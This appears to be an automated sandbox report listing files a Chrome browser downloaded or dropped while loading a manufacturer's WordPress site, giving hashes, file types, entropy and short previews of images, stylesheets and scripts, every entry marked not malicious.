                                                                            SHA-512:9537FE5B8B164732977DE41C90B859359DE2B93FED519FF13487F0895E7FBEDB68E4513F3BE48C1BE19CCF9B2E7F6295CB28AF7FDB5A35BAA8990960C708E9F3
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR.......%......^y..#.5IDATx......E..@i..F..F8........ .T.;kK.-UARG.. ..Tm...Y.0...3.....<...!..:.\.Ti.(j`.J..mJ......lH"....2<hSRR..B....BR.......%..!.S...;..B..,.....!.........S+....;..%...U)!(......B.A.. P.....1..PR..2.+a..j....J:.R."&....<...@8...Rg#.......}..z.b.P..=8..IAT....BwUk......{....e.ab...U-,../=X.h..?hHA..D...;..xX{...,....]|...<d..UP.^~.-&1f.^R..<...X...@.$.t.;aBZ.....8.".X.....H@..\.A..<.@b."...4...\(i...)p.,$A.......7th.(.....;V..G@..-p..B...T...L......W.+........."...8.W....'.E..x.2.R..i!.F....N..L......x.c..U:8......!d.i...`..BU}......^.....c.._z,L....N.H.+.....H:..F.F.qq.L..y', .N....y.#.@.g.A..R.$.Z..s.....$1,t..Q.D..40(4S-aJX`........D..rJ"..F...%`'.R..d....yl.NN...........@....`.P.0..p.8.D......8.-HM....(p....+..9..*@O.a.....`.i...W.`E.i.+....d.V..c.........@a...`...o.3...E.>r}.v(,1.$S| ]"..A(#..vZ.:.D..).4@-0..Iz...G.^........p.D.....BB....y.....i0....v... V......8........].q.$ ..q L.....Cep..G(d....>....4..d.s.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 170 x 65, 8-bit colormap, non-interlaced
                                                                            Category:downloaded
                                                                            Size (bytes):692
                                                                            Entropy (8bit):7.310946309214729
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:A2EA074B1C0B7DF051482831694A6602
                                                                            SHA1:99B59BE3F38C33BF711DC4121B3CB1A9E6FDF6E4
                                                                            SHA-256:244F258E3D134AF2DD232968F440BAB7B4CD664AFAA9D2DD1BF44EECE139F06D
                                                                            SHA-512:4476DE0123CD22E85BB21A0E8F9067E9A429D46F520EE51AB11E0F3A0E05BDBA471D6CA7F6656138A933B1F7203A8AD261F94E56A88603E11FDEC06BCFEF2D86
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/02/John-deer.png
                                                                            Preview:.PNG........IHDR.......A.....v+......PLTE...???????????????????????????%..j....tRNS...... &+3v..Q...;IDATx.... .Em........1.I.NUi.....C.U... .. .. ......S..B._A..S.&$..`3K.).....kUe.XE.......dlcfN>......}.....X.&.(k.. .B3?..9.j1....q{.....U........y.@......Z.~pZ..]....Yy.`].....v.B)s}[.U.T..U.4S9){@C`v..gS%;...X..?....).'<.q..E.*.)+w...U.."nf....>.".t.....*...........F_U....RI...U..k..6.=.nh/.[U.KU.Z.W_Q.Io..*H.....]...*?.j..E+..\....W.UN.f..*.Z.7.. 8C/[...!O.N.h.+..V-.................F5...;.....R..3Q...)Q.o..n.^dVU.Hk6....4.*;`..Wt.W.Qf...... .....`._A1..'+..z..J5..l.!.....fNu......S....UU..U.......................A..A..A.......J5..D.....IEND.B`.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (545)
                                                                            Category:downloaded
                                                                            Size (bytes):46063
                                                                            Entropy (8bit):4.913409495349709
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:D4B9F1E3824550A1A085276152DA127C
                                                                            SHA1:F199FA045E091D7506856B5773AC99A987B259E0
                                                                            SHA-256:D5ECF28FC7243224D08D7C93F0117F6314B37ADE4DFD27EF13545F1E32B6AF1F
                                                                            SHA-512:250F18ACBB3BDEB93B160E02223FFB45FAC93DAD05DFE3CA0A9A325004DB3DCF5FA519DDB8B28B080F92F7556422B4D515C26B852B0541CB174EF85DE98344BF
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/yith-woocommerce-ajax-product-filter-premium/assets/css/shortcodes.css?ver=5.5.0
                                                                            Preview:/* === 1. PRESET SHORTCODE === */..yith-wcan-filters {. background-color: var(--yith-wcan-filters_colors_background, transparent);. margin-bottom: 30px;.}..yith-wcan-filters h3.mobile-only {. display: none;.}..yith-wcan-filters .yith-wcan-filter {. margin-bottom: 30px;.}..yith-wcan-filters .yith-wcan-filter .filter-title {. color: var(--yith-wcan-filters_colors_titles, #434343);.}..yith-wcan-filters .yith-wcan-filter .filter-title.collapsable {. cursor: pointer;. position: relative;.}..yith-wcan-filters .yith-wcan-filter .filter-title.collapsable:after {. background-size: 100% auto;. content: "";. display: block;. height: 10px;. position: absolute;. right: 15px;. top: calc(50% - 5px);. width: 10px;.}..yith-wcan-filters .yith-wcan-filter .filter-title.collapsable.closed:after, .yith-wcan-filters .yith-wcan-filter .filter-title.collapsable:not(.opened):after, .yith-wcan-filters .yith-wcan-filter .filter-title.collapsable:not(.open):after {. background-image: url("../image
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):5086
                                                                            Entropy (8bit):7.961685613404217
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:6E3A382402547CF36345F2190D255FB4
                                                                            SHA1:D84016F8A46A445714FFEAC929D67547B889965D
                                                                            SHA-256:05B3420689A3F38146DFEE505A78812DB7584C79D406FE0EF351F680FE9371FA
                                                                            SHA-512:1BD290E5B40BDB0364680743120719C7D58561066F7E8C1451AAAE53A22AF552C533AF76EF0BABA1F100CB8BACBD75E1987123F9AB9FDB16EDB4DDEB44D2C2C0
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/11/Rock_Badge_Full_Color_Rgb_250px_w_72ppi.png
                                                                            Preview:RIFF....WEBPVP8L..../.@@..a.m..s=S_. .m..n._@..0.A......r.nk.."...o ....Q......!"&.....%.l..T2...G..i.....i.X....W..T...1.&.!..$.v..*.zL0....i$.d..F...F[O.6..8smc......-,l.R.J).a.T.u..._.].s%........}._q.Q.U..vU..W(.2...9w..p.r)<.....+.Z....CT..n.N..(.6r..V.*....}.Z.D..y........qu.b.+........+.66|.A9xV.4./\..\.w1M#..'u..*.#..n...:.....".k.....h..".Y.Z.i`.C:T_....,..<.e6..4Nf^......."5!B....{...ha+@.4/....cz.D.w0.G.........j..x6..../L.t..I..W...g...&..K...D.<v..S....R..W.b(...v<..B..#^m\.....<.5...x...$..].....<].q.h.z..=.x....%...O.R..s..].......gh)iL...x...x.BL.&.q........[..../...q..xW.e $....5r.u...}.....Q..N=.k.2.X>(i.....[.(#.R..gk..#....'....H.u.Aql\N.[=.......s......1.........*.......U.V.O......3....x...*.w......4`.}........n=G..s.....`=.AN..> ..E..9.......m..n..%ye....D.!. .JL. |.T.n FF....|e.... ...T.....c..slQ.n.gQ;..{.$Sy.Q5.3,<..EL).^.W...6...$L,.u......(<. ......[..RE.:..N.y.r.....eJD..U.X+..$.&.NI/ pB..IP..J7..g....
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 300 x 300, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):28732
                                                                            Entropy (8bit):7.975873365243656
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:908F217C3A58DDB237D4629A6462307F
                                                                            SHA1:A33AB0DD1B1D6250F22D57BF942D3FFCE0AC25B1
                                                                            SHA-256:08D24AB1E16223E46FBAABFADA10CCD794F75DCBB0D3A46FFFB32A13728FB105
                                                                            SHA-512:32E8FFAFFCF9BD6E79F809FEBA4C876845DD917B029289AF7FBBA51CCEE2A3A75EDBD01E03B8A932BFBDA1572A968D116440C73E6DDB6168EB4AEC27912087BC
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR...,...,.....y}.u..p.IDATx...1J.Q.D.z..L,..;.L...t..D....L.'44"....@.................................................................................................y..O..7.......a.?u.~.<.M......$...*.t~fgS.d.$Io..$..TF.N}..#SF*#S:.)K*...i....~.......9.3..N.."....V..........'([E.+.f.....b......=........BHw.:=.y..}.|u..\.;z....$.= .-.6..3[.......S.<.A....`).%HB.M&%...L.........?.m.O....7.....`...ss.].;..><Ri..z.{.zo.>..E..bp..(...P.9...48..j..&.`.P..=.........<.2-......#.....c~8@..b!..`W.XC......H...Q.U.p.E..b.VA.iV....X...D..I4...Y..(..~.W.zQ>....=.9J.. ..9.A4O@...4..q....:..;.zo.G....M.G..|...w.^..~.[7|.._.:....z....p.c.5....b3.)......+j6P&.....O..F.OC/.4..<..|.q..2!...|phZ....G^k=.}....y.1B......,..|..g.<.8...P.N..`AKj..+BX..k-....H..!._..Mm9p..CL.xs.......~.p.j..;-........g..5.-..9.A.D... u..-..%K+....=.:n.....;.j ..R.I..T.........+.S...1n?^.....V.0..`.U.l..........._......`...8]5..._.y-%Al......$..7.C+.UH..T
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 31 x 31, 8-bit gray+alpha, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):437
                                                                            Entropy (8bit):7.443005567938762
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:0E6129794C7DA50C62F1A0878411ED12
                                                                            SHA1:8D9E7F06F152A7761BCD36DC9605F25A4648683C
                                                                            SHA-256:2C7E0E5B15E5876AD20B792806A522A9580763389E37F862C0FF96D802004E3F
                                                                            SHA-512:EBB7289EEBC4B1E927418B37D8339026118824454AC47A8ADCE214CA5AE1775A5B7A45E11F130BDBBBBEBA4BE19E43D106A502964F7552DF1B5FC913BF4CEEE1
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR...................|IDATx..!..@..+H.8$I...*~..9]....u....!H.....g0.q.(......f.mB......b7_2.v;...s.......X..o8..7....n..5h...&........4"..u.i.1'.=._..,..L.a.5.....{m.*..A...^0.x..]...%8....O8........0.....2..g..(.h.U...7wY.v<L.y...9....bd..B.g..'E....%.4c...f.8.....xu.W....vt.F...#N.../%>hQR.....u....:.B..}'..O...x.........m..$.:E.....:.......[..%....l.....S.y,.c.C.\S...YZ.:...[.]...Oj.......IEND.B`.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (17638)
                                                                            Category:downloaded
                                                                            Size (bytes):17741
                                                                            Entropy (8bit):5.294608590099363
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:572D66E85091711B6EE76609573A8364
                                                                            SHA1:332031949D78A49E8A18611556253660574E47DB
                                                                            SHA-256:5CBDA29EA5096AC9404C59C77493A2F467D0EB4A27F16C750B61FC0D888DD716
                                                                            SHA-512:CF8394AB0DFCA8D2E99F59626C037D06CA03C7A9DB3458A8E6503A0AE4E9F4D94AF376FCF61832095ABE37915D049A6D20DCEDC67D59DD268A48A512E543FAD1
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/js/build/third-party/anime.min.js?ver=4.5.1
                                                                            Preview:/*. * anime.js v3.2.1. * (c) 2020 Julian Garnier. * Released under the MIT license. * animejs.com. */..!function(n,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):n.anime=e()}(this,function(){"use strict";var n={update:null,begin:null,loopBegin:null,changeBegin:null,change:null,changeComplete:null,loopComplete:null,complete:null,loop:1,direction:"normal",autoplay:!0,timelineOffset:0},e={duration:1e3,delay:0,endDelay:0,easing:"easeOutElastic(1, .5)",round:0},t=["translateX","translateY","translateZ","rotate","rotateX","rotateY","rotateZ","scale","scaleX","scaleY","scaleZ","skew","skewX","skewY","perspective","matrix","matrix3d"],r={CSS:{},springs:{}};function a(n,e,t){return Math.min(Math.max(n,e),t)}function o(n,e){return n.indexOf(e)>-1}function u(n,e){return n.apply(null,e)}var i={arr:function(n){return Array.isArray(n)},obj:function(n){return o(Object.prototype.toString.call(n),"Object")},pth:function(n){retu
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):30
                                                                            Entropy (8bit):3.9898980954642873
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:DA6E54C26310B284B2308243865FB759
                                                                            SHA1:EEACF93FB7140848946848ED4474B0D0E237023B
                                                                            SHA-256:C1138CCC8CA9667CEFC81F39F5877F6C622120F40C177869C2472BEC0B7FC456
                                                                            SHA-512:59F733654C605A26D5855F570E84694008021A58A1BD199D599D82C1D963D1195594C562538083C3058F724CC19F380D53C6EAAC95E910422957C0D754365DFA
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:var aoAdBlockDetected = false;
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (7837), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):7837
                                                                            Entropy (8bit):4.736636843603139
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:E9CF1E8FFE7F7EDBDF51A96C17D0D916
                                                                            SHA1:556E418957BE8906A2C2AE6F0367A041ED459150
                                                                            SHA-256:D176178B77930FB50A9EA8F53555AF01212DB9CBEEF3582A339365810126B31A
                                                                            SHA-512:E4AD7180369FAD8CCA0F4B3E1F648E0F388FB5C0CBCAA5616F4047C66664A394AC862191FC4B1ECED31A563AB6D9C82D079C432DA209A70A246C25FDDCEE100F
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/css/build/elements/asset-reveal-animation.css?ver=17.0.3
                                                                            Preview:.column-image-bg-wrap[data-bg-animation*=reveal-from-] .inner-wrap,.img-with-aniamtion-wrap[data-animation*=reveal-from-] .inner,.nectar-scrolling-text .background-layer[data-bg-animation*=reveal-from-] .inner{opacity:0;overflow:hidden;-webkit-transition:transform 2.3s cubic-bezier(.2,.65,.3,1),opacity .25s ease;transition:transform 2.3s cubic-bezier(.2,.65,.3,1),opacity .25s ease;will-change:transform,opacity;-webkit-backface-visibility:hidden;border-radius:.01%}.column-bg-overlay-wrap[data-bg-animation*=reveal-from-],.column-bg-overlay-wrap[data-bg-animation*=reveal-from-]>div,.column-image-bg-wrap[data-bg-animation*=reveal-from-],.column-image-bg-wrap[data-bg-animation*=reveal-from-] .inner-wrap .column-image-bg,.img-with-aniamtion-wrap[data-animation*=reveal-from-],.img-with-aniamtion-wrap[data-animation*=reveal-from-] .color-overlay,.img-with-aniamtion-wrap[data-animation*=reveal-from-] .hover-wrap .hover-wrap-inner img.img-with-animation,.nectar-scrolling-text .background-layer[d
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 250 x 258, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):5521
                                                                            Entropy (8bit):7.950054538207765
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:8D4BE7AEF2AD15C31CB93FCD0C86062E
                                                                            SHA1:EB2727BB06E2D030152E7B990D1359DBF68F7B70
                                                                            SHA-256:CBF7AFA79CEF256694980AB7E0781AE231C5907D52F6F8075BA01D6DCA8F1745
                                                                            SHA-512:8303B3C91A50069380EFE215EB2A040C2336BD238B9362D35FE6BF4588152878E494513512131F68D6D48677E42AAC68FFC57C553D875FF44E328117BA8396EC
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR...............:....cPLTE..................................................................~..u..k.ya.mW.aM.TC.H9.;/!/%#'..o....tRNS.. 0@P`p........#.......IDATx.... ..`033..EB........5k.Dm...jU..E%...].....q|..O./..a.3......t.ZB[.....{A..5.....>.{X.|... b.D......g.,..1L.^..{a.7X.....$ +.$p......R.".......?..c....S.<?..XH...xV.......9."..-Y....!U....VR.q.G,...\....N.b_....Z...d..Gd.j..VWJ..6.RU...Jfx@..m..+......BU...k...sYw=mOm..^-......n../*.fH....1NTm..c..d........#.1..c?.ZrL.K....c..9..#.........1bO..a...".&&......J......\q8.U...Vl.6yr'x#.l...;........0O...~...\..>..9,".F..^.N...0sUq..Y...k%f#...q....n..+..qeF>.M.f..f.:..23..?9.."{....(ZK....K^r,.......)..b.)|.....Y[..X..m..6....7v4q,k\.J...>W..F...o/....k..m..^..up..PG...z.........d.[.;xb.f.O..n.....t....9..x.2.9.U.....7..`.tzH.4..1...........L..3.......g.l|.../...!g:.n....F....5...../....Bz.#.....059..F.98...!......%......$H...w.,.X..a......r....Y.'$.F)
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (3283), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):3283
                                                                            Entropy (8bit):4.941782423656835
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:398A60BABF7347D763B6160A1180FC96
                                                                            SHA1:DD984A97378AE8D27A5059FC8B376B979A3B4DC1
                                                                            SHA-256:7088A4EAB0F2FB1252DE375E72E85341E6F47EEBC062CD2974C6D22A81082C94
                                                                            SHA-512:AC2BF35CE9DDF8D9440DD19FA7CB9F6D4CF5935EBF6C40AACC49303F0AAA9B58846DC1A41750FC37E5F2F8E392AF3DED63CD8B4117807DD0239C9945AA26B79B
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:jQuery(function(t){!function(){var e="";if(t(".nectar-slider-wrap").each(function(){if(t(this).find(".swiper-container[data-tho]").length>0){var i=t(this).find(".swiper-container").attr("data-tho"),a=t(this).find(".swiper-container").attr("data-tco"),n=t(this).find(".swiper-container").attr("data-pho"),d=t(this).find(".swiper-container").attr("data-pco");"auto"==i&&"auto"==a||(e+="@media only screen and (max-width: 999px) and (min-width: 690px) {","auto"!=i&&(e+="#"+t(this).attr("id")+'.nectar-slider-wrap[data-full-width="false"] .swiper-slide .content .ns-heading-el, #boxed .nectar-slider-wrap#'+t(this).attr("id")+" .swiper-slide .content .ns-heading-el, body .nectar-slider-wrap#"+t(this).attr("id")+'[data-full-width="true"] .swiper-slide .content .ns-heading-el, body .nectar-slider-wrap#'+t(this).attr("id")+'[data-full-width="boxed-full-width"] .swiper-slide .content .ns-heading-el, body .full-width-content .vc_span12 .nectar-slider-wrap#'+t(this).attr("id")+" .swiper-slide .content
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JPEG image data, progressive, precision 8, 1920x805, components 3
                                                                            Category:downloaded
                                                                            Size (bytes):264595
                                                                            Entropy (8bit):7.989330405831783
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:45A7ED32FC48D0821F831367865881DF
                                                                            SHA1:A30D975722C9BB91F6C6B898ECCB42F708AE57C7
                                                                            SHA-256:1366FFA54B9EC5776096FA3DA49FEC68D9D34CB8A775D404E0C7848F0565CA18
                                                                            SHA-512:78C0EAAB369C877AAA7C1CD0627301F7E39CD04996FBE0CEFA0BA8A17D5565592245B0DEEF2929E60FB665D9B2839A5D8B93027765EA0F12AF6FB82D210944B9
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/11/tractor-slider-updated2.jpg
                                                                            Preview:......................................................................................................................................................%...............5..................................................................Ow.ZTQ...JXJ .J..%4.J...l.&...).c...l.!jRDHc....bF.@..t.XS.#...H).X.L..B...C.....P..Dj.......!.D)(....I..$@..[N@%-dF.*%,L....NI*F...5.+Q.J."TB.X ..$-JH.%.W2.... Et.BQ.,`(,@.J.".l....@.V@.DH...`...d..........hQ...J.E........hJ.V9I@..1.....c$.Y.$.Q.(..\Hk) .U*.$.*AX)b..j.r..JD5..!.UcPH.@$bT Uc.4H#.!Z..Z..R.....1C".ENH.aX.cY#..p..#V.A..P.P..."1.9...!..T.........B..P.AE.Z.L....e...Q+,..sJ..FZ..J...pj.)..i"EB.$.....d.....h$9Ew/4......,...$....d..XP...,.R..JV.I.$..u#Q.F...#hd.X5)dJD...*...DV%....V..4H.r......I.;.B. .Yy+AJX+.Z.Pl.J.$r...i.1.-.h*Q.......2JP...@A.h."...2J.T...).h........X......h.T..!4.L.!t....\.!..F;...J.4".j.WN...,a..r24.h..X+IJ.bY.I.:p.....VJR.+..i..Z..9aeu.@..AZ.....+..D.H....+R.($@*P.V8C.j :C....Q.Z.(......R.....@.Dj.m$J..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (5694)
                                                                            Category:downloaded
                                                                            Size (bytes):5805
                                                                            Entropy (8bit):5.411513389896906
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:9722140E9E9CCDF3DA9D53D4E87FE897
                                                                            SHA1:72C9E742AF67BC6A5780E0638A4AF5A5CF4127E2
                                                                            SHA-256:9620ECBBED293518C704254A6DD6B160C5FCDF5F9D6DDCCDBB2D4E5019CC6C24
                                                                            SHA-512:E721A40EBFB4427560539FD15F838AEC0E04DCE643C4F3BC1645660F913C8FDEDA968B483B967DF27F3B10100D1CAE32D5B05B2A10953734F43D3D0C06A5143A
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://js.hsadspixel.net/fb.js
                                                                            Preview:!function(){"use strict";const n="na1",e={APP:"app",APP_API:"app-api"};function t(e,t){const i=t&&t.hubletOverride?t.hubletOverride:e;return i===n?"":`-${i}`}function i(n,i,o){if(o&&o.hubletPostfixLocation&&"domain"===o.hubletPostfixLocation)return i;i===e.APP_API&&(i=e.APP);return`${i}${t(n,o)}`}function o(n,e,t){return`${r(t)}${a(e,t)}${d(n,t)}`}function a(n,e){return"qa"===(e&&e.envOverride?e.envOverride:n)?"qa":""}function r(n){return n&&n.domainOverride?n.domainOverride:"hubspot"}function d(n,e){return e&&e.hubletPostfixLocation&&"domain"===e.hubletPostfixLocation?t(n,e):""}function s(n){return n&&n.tldOverride?n.tldOverride:"com"}function c(n){return n===e.APP_API?"/api":""}function l(n,e,t,a){return`https://${i(e,n,a)}.${o(e,t,a)}.${s(a)}${c(n)}`}const u="data-hsjs-portal",p="data-hsjs-env",f="data-hsjs-hublet",w={PROD:"prod",QA:"qa"};function h(n){if(!n)return null;const e=document.querySelectorAll(`script[${n}]`);return e.length?e[0].getAttribute(n):null}function b(){return h(
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):1364
                                                                            Entropy (8bit):7.798311594918934
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:73BCF74CBA56A8310D0AF249FDE96EA5
                                                                            SHA1:B6C732D711D622DA0053E37D519B83C78DF3CD25
                                                                            SHA-256:031187F76BE301D9EA09C85615C8F68244DAFFF4359CCF045B121A380B8ABA77
                                                                            SHA-512:44F9C0BBEBF7E230D8196A889B02EF6411946FDE14811CEDF2A3AD0D7D41CAC2D690418ADA93799B97F16B6635D0F4AE1D08B428FBA0FACA5F62335A521FDB55
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/10/aem-logo.png
                                                                            Preview:RIFFL...WEBPVP8L?.../|....a m..7..71..0m....NV.L.....@<. .G!@...........Q....`......m.N".sR.DTI*.........".?...}#"ws.h.3.............x .r3$\...+.SnF.......:..i.....i.l...L.:...^4...y..q....^r.f+....".Z.8.H..8..%;X<'.9.u..'.....@c;/........BG....q0(OD..obk"..(.M$..'B..1..R..O9#a.:""J.^....wB.....l....?.""..BI$...s......zB.&.".......H.;.....7......L.O.0.Z...}UE...@C..w>.<..D...C.FX .3..0....sv..S...*=".....|...&....3".._..+......q@.Q.&}\.w[.. ..D..6...]....-..m2...jnB...c....O.7...7.M.$m..'p.i......q..3..(6........@c.lN..7....4k?..-..H..T].u.f.:.......NRX].u....4... y..). ...i...g..X....q.BP.+...p5......./ ......f..H&. X"....h.'Y.(6.,.....,........l...W.Z.....M.yA.5.;......:..{..>..U..z..`.5.=L/.m..j.2..2.....y.J......l...F..._./.vm=>d?h..O:.q...Is.kF;M...=...`.....e.8..1..i......x.J<..._.^i.....9....}...`;..'..Y......g`..9......Y./...l....H...c....gt.0.9.!..j....,......m.9.s...4....lDy.nL.S~;.A. ~......R7.^.`..b_....;.i...C j..(...I......e
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 125 x 64, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):1458
                                                                            Entropy (8bit):7.402506484034618
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:DC338E53A1CC144D764662AB8AFE0863
                                                                            SHA1:58B53AEDD64362D345C9E6AC41AE967445EEAD9E
                                                                            SHA-256:05C12604D60A410913F2422E5BDC96128D955CF73F67877FAB3EC96B4EB584AE
                                                                            SHA-512:17F774848C4C7EEA11CEAD832B8919ED85746BCF5D23998D8E0349708CC696AC3A2D3788E60EAB23E0ED56A5BB0A773A55BA53CF8F2E4965FE756356825E525D
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR...}...@........d....PLTE..............................................................................................................................................................................-..*...:tRNS..#...4..Z..8.gP_..k..p.K.<wu.{...&...Ic..T+@..../F....^.<....yIDATx.....H...CF.".A%(j....J...\l.....T....$..F..h...D|....(...VJ.[p|j1...`'.bx%O.-^....z9.Z.J.....O;.P.&..T....ws.Q...@.H.G^....K'#...L2..cN.i.O.........e..%$.....Y+.......(...-.'?...:.j..,j(....-.PJ.cF$e".,.`..o."&9On3........n.C/..O...$.L......1..*.:..2..&...G.Vt!.....%t.5..6.....-.Y....Y......2"...|.O....:j!.#.~.....@..9..NHY..A.V...S...H.z...Q._n([d....u.J...h%..9.j$.N.\K.[:.Qv)*,g'.S..E..V=..YE..QvQ.e.($6..k.G.Z.......l....PP........#*..yb...*-PpH..+.W.....%@...ZB.......h.<H..P>q<..b...Pe..F...G...d...y....r....2R.Z@.}.....\..............N.o....P<S..>.q.K.8........6I.....L).n6.%.t..Vx3.....y..u....Z.&e....t,.>..h....:$.EY?*..(..-J.8..W....D.)%.>.D.S!...,i~.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):26690
                                                                            Entropy (8bit):7.95779291170883
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:ECE088811EDB97539ABC950B0D767428
                                                                            SHA1:99F602FCFD6BC629AE654EB26119534C6B368B76
                                                                            SHA-256:AADC777EA263FA0B7EC5ABAC2C61886ECA9C5B4F42D47997C3E54A856AD1B9EB
                                                                            SHA-512:B3FF34EA83706DE943E9F776293484CD42F209F34AD529B2DC638F90C7288EE886D39019A0F88958966F3A927C50AA396220FF337090B38CD7BBF62D91E48696
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2024/09/K3DJBTH-300x232.png
                                                                            Preview:RIFF:h..WEBPVP8L.h../+.9.M@r.H..."+c....<[...O....Ku=d..;.'.{......=..U.^v...tw..^.........w.(.......I.s.d...>..`......H`....6o.l;$.MkNu..G..X.....9..;...bM.!U..`).}N.VVU.}..T..=..GK...$e..F.t3+3.^.0G...*}....?B....L.BZm[y..u.vT..;*..../...r.P..#n.Qm.u..Yr...?.W*.G.......q.....d;.-...4A7u.N....x........%..Z.\.0.u.*..r.....$..8........Vl+.Y..x.[..g3L.L..{.7...f.......`".....b.a.#E...A...I.=...(..BOF..I.\..P...i..Y.N.6.(.%5..X.. 7.F....[.......].3h.Q....1.x......1..oSs..W..*.........g..xa.An ....p1.......j..:]...N....].S...a.]E.<u....>~...d.P...qM.U.`f..../....!../.^"1..S;...Gl.n(.{..0;-.B!U....L.b_..Vh)Q3...x....uYR...Myds....`..J..e.......vH...m..!....:...Y.YO.!..s..oCw$...eF}...`i..VcgS{ .8..o.<..3k.......^7..0..[3].N?rF;Y...I.......\...1..m.H....v....9"&./.W.kj.77x....`...(.s.....6ib......p.g..Q....].1]..B../.[.Dm."I....ED....#"#..2....03.r.<.....3334e..J....p0T...?'3".W..#...e.$I....DD....!....k*5......33sG.......|.s}K...m[.....Z..>...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (3022), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):3022
                                                                            Entropy (8bit):4.830222073535995
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:B1CDF74BE074746340AE9D2ECF95CF57
                                                                            SHA1:9BD8FE7491304DA7B0CB4B2D62AF2B9AC2283E92
                                                                            SHA-256:C537D07DD31BF657DDF87DCE1607543D8DEE14FD2C9BCE3ECE40E2E3F8E387E6
                                                                            SHA-512:323BC2C9046AD61014E209B95F0950142707A6B59FA911F4E84591CB1EFFFFC6B8E1CB802C9EFA041C016A8D023BDE9C49F9956B74A4E23161AD6F513DD0A744
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/woo-product-slider/src/Admin/assets/css/fontello.min.css?ver=2.8.2
